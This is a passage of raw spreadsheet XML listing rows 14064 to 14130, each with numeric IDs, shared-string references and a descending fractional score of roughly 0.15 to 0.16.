    <row r="14064" ht="15.75" customHeight="1">
      <c r="A14064" s="1">
        <v>9426.0</v>
      </c>
      <c r="B14064" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C14064" s="2" t="s">
        <v>13541</v>
      </c>
      <c r="D14064" s="2">
        <v>1.0</v>
      </c>
      <c r="E14064" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14064" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
    <row r="14065" ht="15.75" customHeight="1">
      <c r="A14065" s="1">
        <v>4413.0</v>
      </c>
      <c r="B14065" s="2">
        <v>4.2283983E7</v>
      </c>
      <c r="C14065" s="2" t="s">
        <v>13542</v>
      </c>
      <c r="D14065" s="2">
        <v>1.0</v>
      </c>
      <c r="E14065" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14065" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="14066" ht="15.75" customHeight="1">
      <c r="A14066" s="1">
        <v>3194.0</v>
      </c>
      <c r="B14066" s="2">
        <v>3.7227048E7</v>
      </c>
      <c r="C14066" s="2" t="s">
        <v>13543</v>
      </c>
      <c r="D14066" s="2">
        <v>1.0</v>
      </c>
      <c r="E14066" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14066" s="2">
        <v>0.1636225266362253</v>
      </c>
    </row>
    <row r="14067" ht="15.75" customHeight="1">
      <c r="A14067" s="1">
        <v>2041.0</v>
      </c>
      <c r="B14067" s="2">
        <v>3.0895426E7</v>
      </c>
      <c r="C14067" s="2" t="s">
        <v>13544</v>
      </c>
      <c r="D14067" s="2">
        <v>1.0</v>
      </c>
      <c r="E14067" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14067" s="2">
        <v>0.1628352490421456</v>
      </c>
    </row>
    <row r="14068" ht="15.75" customHeight="1">
      <c r="A14068" s="1">
        <v>19518.0</v>
      </c>
      <c r="B14068" s="2">
        <v>5.5956478E7</v>
      </c>
      <c r="C14068" s="2" t="s">
        <v>13545</v>
      </c>
      <c r="D14068" s="2">
        <v>1.0</v>
      </c>
      <c r="E14068" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14068" s="2">
        <v>0.1625816993464053</v>
      </c>
    </row>
    <row r="14069" ht="15.75" customHeight="1">
      <c r="A14069" s="1">
        <v>7649.0</v>
      </c>
      <c r="B14069" s="2">
        <v>5.1787012E7</v>
      </c>
      <c r="C14069" s="2" t="s">
        <v>13546</v>
      </c>
      <c r="D14069" s="2">
        <v>1.0</v>
      </c>
      <c r="E14069" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14069" s="2">
        <v>0.1622222222222222</v>
      </c>
    </row>
    <row r="14070" ht="15.75" customHeight="1">
      <c r="A14070" s="1">
        <v>16000.0</v>
      </c>
      <c r="B14070" s="2">
        <v>4.4967385E7</v>
      </c>
      <c r="C14070" s="2" t="s">
        <v>13547</v>
      </c>
      <c r="D14070" s="2">
        <v>1.0</v>
      </c>
      <c r="E14070" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14070" s="2">
        <v>0.1621004566210046</v>
      </c>
    </row>
    <row r="14071" ht="15.75" customHeight="1">
      <c r="A14071" s="1">
        <v>30632.0</v>
      </c>
      <c r="B14071" s="2">
        <v>4.1417496E7</v>
      </c>
      <c r="C14071" s="2" t="s">
        <v>13548</v>
      </c>
      <c r="D14071" s="2">
        <v>1.0</v>
      </c>
      <c r="E14071" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14071" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="14072" ht="15.75" customHeight="1">
      <c r="A14072" s="1">
        <v>18495.0</v>
      </c>
      <c r="B14072" s="2">
        <v>5.2926349E7</v>
      </c>
      <c r="C14072" s="2" t="s">
        <v>13549</v>
      </c>
      <c r="D14072" s="2">
        <v>1.0</v>
      </c>
      <c r="E14072" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14072" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="14073" ht="15.75" customHeight="1">
      <c r="A14073" s="1">
        <v>1698.0</v>
      </c>
      <c r="B14073" s="2">
        <v>2.8524769E7</v>
      </c>
      <c r="C14073" s="2" t="s">
        <v>13550</v>
      </c>
      <c r="D14073" s="2">
        <v>1.0</v>
      </c>
      <c r="E14073" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14073" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="14074" ht="15.75" customHeight="1">
      <c r="A14074" s="1">
        <v>4399.0</v>
      </c>
      <c r="B14074" s="2">
        <v>4.2264358E7</v>
      </c>
      <c r="C14074" s="2" t="s">
        <v>13551</v>
      </c>
      <c r="D14074" s="2">
        <v>1.0</v>
      </c>
      <c r="E14074" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14074" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="14075" ht="15.75" customHeight="1">
      <c r="A14075" s="1">
        <v>11744.0</v>
      </c>
      <c r="B14075" s="2">
        <v>2.4070742E7</v>
      </c>
      <c r="C14075" s="2" t="s">
        <v>13552</v>
      </c>
      <c r="D14075" s="2">
        <v>1.0</v>
      </c>
      <c r="E14075" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14075" s="2">
        <v>0.1607744107744108</v>
      </c>
    </row>
    <row r="14076" ht="15.75" customHeight="1">
      <c r="A14076" s="1">
        <v>10923.0</v>
      </c>
      <c r="B14076" s="2">
        <v>1.6801897E7</v>
      </c>
      <c r="C14076" s="2" t="s">
        <v>13553</v>
      </c>
      <c r="D14076" s="2">
        <v>1.0</v>
      </c>
      <c r="E14076" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14076" s="2">
        <v>0.1606060606060606</v>
      </c>
    </row>
    <row r="14077" ht="15.75" customHeight="1">
      <c r="A14077" s="1">
        <v>16003.0</v>
      </c>
      <c r="B14077" s="2">
        <v>4.4969769E7</v>
      </c>
      <c r="C14077" s="2" t="s">
        <v>13554</v>
      </c>
      <c r="D14077" s="2">
        <v>1.0</v>
      </c>
      <c r="E14077" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14077" s="2">
        <v>0.1604068857589985</v>
      </c>
    </row>
    <row r="14078" ht="15.75" customHeight="1">
      <c r="A14078" s="1">
        <v>4114.0</v>
      </c>
      <c r="B14078" s="2">
        <v>4.1350031E7</v>
      </c>
      <c r="C14078" s="2" t="s">
        <v>13555</v>
      </c>
      <c r="D14078" s="2">
        <v>1.0</v>
      </c>
      <c r="E14078" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14078" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="14079" ht="15.75" customHeight="1">
      <c r="A14079" s="1">
        <v>19209.0</v>
      </c>
      <c r="B14079" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C14079" s="2" t="s">
        <v>13556</v>
      </c>
      <c r="D14079" s="2">
        <v>1.0</v>
      </c>
      <c r="E14079" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14079" s="2">
        <v>0.1602254428341385</v>
      </c>
    </row>
    <row r="14080" ht="15.75" customHeight="1">
      <c r="A14080" s="1">
        <v>33534.0</v>
      </c>
      <c r="B14080" s="2">
        <v>8140332.0</v>
      </c>
      <c r="C14080" s="2" t="s">
        <v>13557</v>
      </c>
      <c r="D14080" s="2">
        <v>1.0</v>
      </c>
      <c r="E14080" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14080" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="14081" ht="15.75" customHeight="1">
      <c r="A14081" s="1">
        <v>7767.0</v>
      </c>
      <c r="B14081" s="2">
        <v>5.2114456E7</v>
      </c>
      <c r="C14081" s="2" t="s">
        <v>13558</v>
      </c>
      <c r="D14081" s="2">
        <v>1.0</v>
      </c>
      <c r="E14081" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14081" s="2">
        <v>0.1596119929453264</v>
      </c>
    </row>
    <row r="14082" ht="15.75" customHeight="1">
      <c r="A14082" s="1">
        <v>31213.0</v>
      </c>
      <c r="B14082" s="2">
        <v>4925837.0</v>
      </c>
      <c r="C14082" s="2" t="s">
        <v>13559</v>
      </c>
      <c r="D14082" s="2">
        <v>1.0</v>
      </c>
      <c r="E14082" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14082" s="2">
        <v>0.1593137254901961</v>
      </c>
    </row>
    <row r="14083" ht="15.75" customHeight="1">
      <c r="A14083" s="1">
        <v>6695.0</v>
      </c>
      <c r="B14083" s="2">
        <v>4.9191443E7</v>
      </c>
      <c r="C14083" s="2" t="s">
        <v>13560</v>
      </c>
      <c r="D14083" s="2">
        <v>1.0</v>
      </c>
      <c r="E14083" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14083" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="14084" ht="15.75" customHeight="1">
      <c r="A14084" s="1">
        <v>16545.0</v>
      </c>
      <c r="B14084" s="2">
        <v>4.6803127E7</v>
      </c>
      <c r="C14084" s="2" t="s">
        <v>13561</v>
      </c>
      <c r="D14084" s="2">
        <v>1.0</v>
      </c>
      <c r="E14084" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14084" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="14085" ht="15.75" customHeight="1">
      <c r="A14085" s="1">
        <v>1190.0</v>
      </c>
      <c r="B14085" s="2">
        <v>2.470015E7</v>
      </c>
      <c r="C14085" s="2" t="s">
        <v>13562</v>
      </c>
      <c r="D14085" s="2">
        <v>1.0</v>
      </c>
      <c r="E14085" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14085" s="2">
        <v>0.1588419405320814</v>
      </c>
    </row>
    <row r="14086" ht="15.75" customHeight="1">
      <c r="A14086" s="1">
        <v>6098.0</v>
      </c>
      <c r="B14086" s="2">
        <v>4.7702804E7</v>
      </c>
      <c r="C14086" s="2" t="s">
        <v>13563</v>
      </c>
      <c r="D14086" s="2">
        <v>1.0</v>
      </c>
      <c r="E14086" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14086" s="2">
        <v>0.1581196581196581</v>
      </c>
    </row>
    <row r="14087" ht="15.75" customHeight="1">
      <c r="A14087" s="1">
        <v>30381.0</v>
      </c>
      <c r="B14087" s="2">
        <v>3.8537922E7</v>
      </c>
      <c r="C14087" s="2" t="s">
        <v>13564</v>
      </c>
      <c r="D14087" s="2">
        <v>1.0</v>
      </c>
      <c r="E14087" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14087" s="2">
        <v>0.1581196581196581</v>
      </c>
    </row>
    <row r="14088" ht="15.75" customHeight="1">
      <c r="A14088" s="1">
        <v>9082.0</v>
      </c>
      <c r="B14088" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C14088" s="2" t="s">
        <v>13565</v>
      </c>
      <c r="D14088" s="2">
        <v>1.0</v>
      </c>
      <c r="E14088" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14088" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="14089" ht="15.75" customHeight="1">
      <c r="A14089" s="1">
        <v>25871.0</v>
      </c>
      <c r="B14089" s="2">
        <v>1.4903974E7</v>
      </c>
      <c r="C14089" s="2" t="s">
        <v>13566</v>
      </c>
      <c r="D14089" s="2">
        <v>1.0</v>
      </c>
      <c r="E14089" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14089" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="14090" ht="15.75" customHeight="1">
      <c r="A14090" s="1">
        <v>2337.0</v>
      </c>
      <c r="B14090" s="2">
        <v>3.296128E7</v>
      </c>
      <c r="C14090" s="2" t="s">
        <v>13567</v>
      </c>
      <c r="D14090" s="2">
        <v>1.0</v>
      </c>
      <c r="E14090" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14090" s="2">
        <v>0.157936507936508</v>
      </c>
    </row>
    <row r="14091" ht="15.75" customHeight="1">
      <c r="A14091" s="1">
        <v>13635.0</v>
      </c>
      <c r="B14091" s="2">
        <v>3.5909363E7</v>
      </c>
      <c r="C14091" s="2" t="s">
        <v>13568</v>
      </c>
      <c r="D14091" s="2">
        <v>1.0</v>
      </c>
      <c r="E14091" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14091" s="2">
        <v>0.1578483245149913</v>
      </c>
    </row>
    <row r="14092" ht="15.75" customHeight="1">
      <c r="A14092" s="1">
        <v>10206.0</v>
      </c>
      <c r="B14092" s="2">
        <v>5.7417764E7</v>
      </c>
      <c r="C14092" s="2" t="s">
        <v>13569</v>
      </c>
      <c r="D14092" s="2">
        <v>1.0</v>
      </c>
      <c r="E14092" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14092" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="14093" ht="15.75" customHeight="1">
      <c r="A14093" s="1">
        <v>15799.0</v>
      </c>
      <c r="B14093" s="2">
        <v>4.4211439E7</v>
      </c>
      <c r="C14093" s="2" t="s">
        <v>13570</v>
      </c>
      <c r="D14093" s="2">
        <v>1.0</v>
      </c>
      <c r="E14093" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14093" s="2">
        <v>0.1571969696969697</v>
      </c>
    </row>
    <row r="14094" ht="15.75" customHeight="1">
      <c r="A14094" s="1">
        <v>17738.0</v>
      </c>
      <c r="B14094" s="2">
        <v>5.067815E7</v>
      </c>
      <c r="C14094" s="2" t="s">
        <v>13571</v>
      </c>
      <c r="D14094" s="2">
        <v>1.0</v>
      </c>
      <c r="E14094" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14094" s="2">
        <v>0.1569200779727097</v>
      </c>
    </row>
    <row r="14095" ht="15.75" customHeight="1">
      <c r="A14095" s="1">
        <v>5197.0</v>
      </c>
      <c r="B14095" s="2">
        <v>4.4859051E7</v>
      </c>
      <c r="C14095" s="2" t="s">
        <v>13572</v>
      </c>
      <c r="D14095" s="2">
        <v>1.0</v>
      </c>
      <c r="E14095" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14095" s="2">
        <v>0.1564814814814815</v>
      </c>
    </row>
    <row r="14096" ht="15.75" customHeight="1">
      <c r="A14096" s="1">
        <v>8352.0</v>
      </c>
      <c r="B14096" s="2">
        <v>5.3752096E7</v>
      </c>
      <c r="C14096" s="2" t="s">
        <v>13573</v>
      </c>
      <c r="D14096" s="2">
        <v>1.0</v>
      </c>
      <c r="E14096" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14096" s="2">
        <v>0.1560846560846562</v>
      </c>
    </row>
    <row r="14097" ht="15.75" customHeight="1">
      <c r="A14097" s="1">
        <v>5219.0</v>
      </c>
      <c r="B14097" s="2">
        <v>4.4967826E7</v>
      </c>
      <c r="C14097" s="2" t="s">
        <v>13574</v>
      </c>
      <c r="D14097" s="2">
        <v>1.0</v>
      </c>
      <c r="E14097" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14097" s="2">
        <v>0.155982905982906</v>
      </c>
    </row>
    <row r="14098" ht="15.75" customHeight="1">
      <c r="A14098" s="1">
        <v>17276.0</v>
      </c>
      <c r="B14098" s="2">
        <v>4.920387E7</v>
      </c>
      <c r="C14098" s="2" t="s">
        <v>13575</v>
      </c>
      <c r="D14098" s="2">
        <v>1.0</v>
      </c>
      <c r="E14098" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14098" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="14099" ht="15.75" customHeight="1">
      <c r="A14099" s="1">
        <v>7042.0</v>
      </c>
      <c r="B14099" s="2">
        <v>5.0142387E7</v>
      </c>
      <c r="C14099" s="2" t="s">
        <v>13576</v>
      </c>
      <c r="D14099" s="2">
        <v>1.0</v>
      </c>
      <c r="E14099" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14099" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="14100" ht="15.75" customHeight="1">
      <c r="A14100" s="1">
        <v>30854.0</v>
      </c>
      <c r="B14100" s="2">
        <v>4.5988563E7</v>
      </c>
      <c r="C14100" s="2" t="s">
        <v>13577</v>
      </c>
      <c r="D14100" s="2">
        <v>1.0</v>
      </c>
      <c r="E14100" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14100" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="14101" ht="15.75" customHeight="1">
      <c r="A14101" s="1">
        <v>12624.0</v>
      </c>
      <c r="B14101" s="2">
        <v>3.0236917E7</v>
      </c>
      <c r="C14101" s="2" t="s">
        <v>13578</v>
      </c>
      <c r="D14101" s="2">
        <v>1.0</v>
      </c>
      <c r="E14101" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14101" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="14102" ht="15.75" customHeight="1">
      <c r="A14102" s="1">
        <v>13820.0</v>
      </c>
      <c r="B14102" s="2">
        <v>3.6744053E7</v>
      </c>
      <c r="C14102" s="2" t="s">
        <v>13579</v>
      </c>
      <c r="D14102" s="2">
        <v>1.0</v>
      </c>
      <c r="E14102" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14102" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="14103" ht="15.75" customHeight="1">
      <c r="A14103" s="1">
        <v>16075.0</v>
      </c>
      <c r="B14103" s="2">
        <v>4.5327034E7</v>
      </c>
      <c r="C14103" s="2" t="s">
        <v>13580</v>
      </c>
      <c r="D14103" s="2">
        <v>1.0</v>
      </c>
      <c r="E14103" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14103" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="14104" ht="15.75" customHeight="1">
      <c r="A14104" s="1">
        <v>2476.0</v>
      </c>
      <c r="B14104" s="2">
        <v>3.3847603E7</v>
      </c>
      <c r="C14104" s="2" t="s">
        <v>13581</v>
      </c>
      <c r="D14104" s="2">
        <v>1.0</v>
      </c>
      <c r="E14104" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14104" s="2">
        <v>0.1550580431177447</v>
      </c>
    </row>
    <row r="14105" ht="15.75" customHeight="1">
      <c r="A14105" s="1">
        <v>720.0</v>
      </c>
      <c r="B14105" s="2">
        <v>2.0688693E7</v>
      </c>
      <c r="C14105" s="2" t="s">
        <v>13582</v>
      </c>
      <c r="D14105" s="2">
        <v>1.0</v>
      </c>
      <c r="E14105" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14105" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="14106" ht="15.75" customHeight="1">
      <c r="A14106" s="1">
        <v>13058.0</v>
      </c>
      <c r="B14106" s="2">
        <v>3.3232561E7</v>
      </c>
      <c r="C14106" s="2" t="s">
        <v>13583</v>
      </c>
      <c r="D14106" s="2">
        <v>1.0</v>
      </c>
      <c r="E14106" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14106" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="14107" ht="15.75" customHeight="1">
      <c r="A14107" s="1">
        <v>18037.0</v>
      </c>
      <c r="B14107" s="2">
        <v>5.153583E7</v>
      </c>
      <c r="C14107" s="2" t="s">
        <v>13584</v>
      </c>
      <c r="D14107" s="2">
        <v>1.0</v>
      </c>
      <c r="E14107" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14107" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="14108" ht="15.75" customHeight="1">
      <c r="A14108" s="1">
        <v>28232.0</v>
      </c>
      <c r="B14108" s="2">
        <v>2.5141897E7</v>
      </c>
      <c r="C14108" s="2" t="s">
        <v>13585</v>
      </c>
      <c r="D14108" s="2">
        <v>1.0</v>
      </c>
      <c r="E14108" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14108" s="2">
        <v>0.1543927648578811</v>
      </c>
    </row>
    <row r="14109" ht="15.75" customHeight="1">
      <c r="A14109" s="1">
        <v>6704.0</v>
      </c>
      <c r="B14109" s="2">
        <v>4.9216765E7</v>
      </c>
      <c r="C14109" s="2" t="s">
        <v>13586</v>
      </c>
      <c r="D14109" s="2">
        <v>1.0</v>
      </c>
      <c r="E14109" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14109" s="2">
        <v>0.1543209876543211</v>
      </c>
    </row>
    <row r="14110" ht="15.75" customHeight="1">
      <c r="A14110" s="1">
        <v>9838.0</v>
      </c>
      <c r="B14110" s="2">
        <v>5.6653609E7</v>
      </c>
      <c r="C14110" s="2" t="s">
        <v>13587</v>
      </c>
      <c r="D14110" s="2">
        <v>1.0</v>
      </c>
      <c r="E14110" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14110" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="14111" ht="15.75" customHeight="1">
      <c r="A14111" s="1">
        <v>11893.0</v>
      </c>
      <c r="B14111" s="2">
        <v>2.5110706E7</v>
      </c>
      <c r="C14111" s="2" t="s">
        <v>13588</v>
      </c>
      <c r="D14111" s="2">
        <v>1.0</v>
      </c>
      <c r="E14111" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14111" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="14112" ht="15.75" customHeight="1">
      <c r="A14112" s="1">
        <v>17508.0</v>
      </c>
      <c r="B14112" s="2">
        <v>5.0009784E7</v>
      </c>
      <c r="C14112" s="2" t="s">
        <v>13589</v>
      </c>
      <c r="D14112" s="2">
        <v>1.0</v>
      </c>
      <c r="E14112" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14112" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="14113" ht="15.75" customHeight="1">
      <c r="A14113" s="1">
        <v>4415.0</v>
      </c>
      <c r="B14113" s="2">
        <v>4.2283983E7</v>
      </c>
      <c r="C14113" s="2" t="s">
        <v>13590</v>
      </c>
      <c r="D14113" s="2">
        <v>1.0</v>
      </c>
      <c r="E14113" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14113" s="2">
        <v>0.1541471048513303</v>
      </c>
    </row>
    <row r="14114" ht="15.75" customHeight="1">
      <c r="A14114" s="1">
        <v>25696.0</v>
      </c>
      <c r="B14114" s="2">
        <v>1.4528518E7</v>
      </c>
      <c r="C14114" s="2" t="s">
        <v>13591</v>
      </c>
      <c r="D14114" s="2">
        <v>1.0</v>
      </c>
      <c r="E14114" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14114" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="14115" ht="15.75" customHeight="1">
      <c r="A14115" s="1">
        <v>30478.0</v>
      </c>
      <c r="B14115" s="2">
        <v>3.9708608E7</v>
      </c>
      <c r="C14115" s="2" t="s">
        <v>13592</v>
      </c>
      <c r="D14115" s="2">
        <v>1.0</v>
      </c>
      <c r="E14115" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14115" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="14116" ht="15.75" customHeight="1">
      <c r="A14116" s="1">
        <v>2011.0</v>
      </c>
      <c r="B14116" s="2">
        <v>3.0701868E7</v>
      </c>
      <c r="C14116" s="2" t="s">
        <v>13593</v>
      </c>
      <c r="D14116" s="2">
        <v>1.0</v>
      </c>
      <c r="E14116" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14116" s="2">
        <v>0.1533996683250415</v>
      </c>
    </row>
    <row r="14117" ht="15.75" customHeight="1">
      <c r="A14117" s="1">
        <v>1737.0</v>
      </c>
      <c r="B14117" s="2">
        <v>2.8784338E7</v>
      </c>
      <c r="C14117" s="2" t="s">
        <v>13594</v>
      </c>
      <c r="D14117" s="2">
        <v>1.0</v>
      </c>
      <c r="E14117" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14117" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="14118" ht="15.75" customHeight="1">
      <c r="A14118" s="1">
        <v>11335.0</v>
      </c>
      <c r="B14118" s="2">
        <v>2.1188968E7</v>
      </c>
      <c r="C14118" s="2" t="s">
        <v>13595</v>
      </c>
      <c r="D14118" s="2">
        <v>1.0</v>
      </c>
      <c r="E14118" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14118" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="14119" ht="15.75" customHeight="1">
      <c r="A14119" s="1">
        <v>6509.0</v>
      </c>
      <c r="B14119" s="2">
        <v>4.8757614E7</v>
      </c>
      <c r="C14119" s="2" t="s">
        <v>13596</v>
      </c>
      <c r="D14119" s="2">
        <v>1.0</v>
      </c>
      <c r="E14119" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14119" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="14120" ht="15.75" customHeight="1">
      <c r="A14120" s="1">
        <v>15724.0</v>
      </c>
      <c r="B14120" s="2">
        <v>4.4005448E7</v>
      </c>
      <c r="C14120" s="2" t="s">
        <v>13597</v>
      </c>
      <c r="D14120" s="2">
        <v>1.0</v>
      </c>
      <c r="E14120" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14120" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="14121" ht="15.75" customHeight="1">
      <c r="A14121" s="1">
        <v>19188.0</v>
      </c>
      <c r="B14121" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C14121" s="2" t="s">
        <v>13598</v>
      </c>
      <c r="D14121" s="2">
        <v>1.0</v>
      </c>
      <c r="E14121" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14121" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="14122" ht="15.75" customHeight="1">
      <c r="A14122" s="1">
        <v>24572.0</v>
      </c>
      <c r="B14122" s="2">
        <v>1.1317908E7</v>
      </c>
      <c r="C14122" s="2" t="s">
        <v>13599</v>
      </c>
      <c r="D14122" s="2">
        <v>1.0</v>
      </c>
      <c r="E14122" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14122" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="14123" ht="15.75" customHeight="1">
      <c r="A14123" s="1">
        <v>25830.0</v>
      </c>
      <c r="B14123" s="2">
        <v>1.4770875E7</v>
      </c>
      <c r="C14123" s="2" t="s">
        <v>13600</v>
      </c>
      <c r="D14123" s="2">
        <v>1.0</v>
      </c>
      <c r="E14123" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14123" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="14124" ht="15.75" customHeight="1">
      <c r="A14124" s="1">
        <v>18262.0</v>
      </c>
      <c r="B14124" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C14124" s="2" t="s">
        <v>13601</v>
      </c>
      <c r="D14124" s="2">
        <v>1.0</v>
      </c>
      <c r="E14124" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14124" s="2">
        <v>0.1517412935323383</v>
      </c>
    </row>
    <row r="14125" ht="15.75" customHeight="1">
      <c r="A14125" s="1">
        <v>29401.0</v>
      </c>
      <c r="B14125" s="2">
        <v>3.1958088E7</v>
      </c>
      <c r="C14125" s="2" t="s">
        <v>13602</v>
      </c>
      <c r="D14125" s="2">
        <v>1.0</v>
      </c>
      <c r="E14125" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14125" s="2">
        <v>0.1517094017094017</v>
      </c>
    </row>
    <row r="14126" ht="15.75" customHeight="1">
      <c r="A14126" s="1">
        <v>2214.0</v>
      </c>
      <c r="B14126" s="2">
        <v>3.2078219E7</v>
      </c>
      <c r="C14126" s="2" t="s">
        <v>13603</v>
      </c>
      <c r="D14126" s="2">
        <v>1.0</v>
      </c>
      <c r="E14126" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14126" s="2">
        <v>0.1515873015873016</v>
      </c>
    </row>
    <row r="14127" ht="15.75" customHeight="1">
      <c r="A14127" s="1">
        <v>2448.0</v>
      </c>
      <c r="B14127" s="2">
        <v>3.3711323E7</v>
      </c>
      <c r="C14127" s="2" t="s">
        <v>13604</v>
      </c>
      <c r="D14127" s="2">
        <v>1.0</v>
      </c>
      <c r="E14127" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14127" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="14128" ht="15.75" customHeight="1">
      <c r="A14128" s="1">
        <v>19869.0</v>
      </c>
      <c r="B14128" s="2">
        <v>5.721421E7</v>
      </c>
      <c r="C14128" s="2" t="s">
        <v>13605</v>
      </c>
      <c r="D14128" s="2">
        <v>1.0</v>
      </c>
      <c r="E14128" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14128" s="2">
        <v>0.1512820512820513</v>
      </c>
    </row>
    <row r="14129" ht="15.75" customHeight="1">
      <c r="A14129" s="1">
        <v>626.0</v>
      </c>
      <c r="B14129" s="2">
        <v>1.9622836E7</v>
      </c>
      <c r="C14129" s="2" t="s">
        <v>13606</v>
      </c>
      <c r="D14129" s="2">
        <v>1.0</v>
      </c>
      <c r="E14129" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14129" s="2">
        <v>0.1510172143974961</v>
      </c>
    </row>
    <row r="14130" ht="15.75" customHeight="1">
      <c r="A14130" s="1">
        <v>5224.0</v>
      </c>
      <c r="B14130" s="2">
        <v>4.4969924E7</v>
      </c>
      <c r="C14130" s="2" t="s">
        <v>13607</v>
      </c>
      <c r="D14130" s="2">
        <v>1.0</v>
      </c>
      <c r="E14130" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14130" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
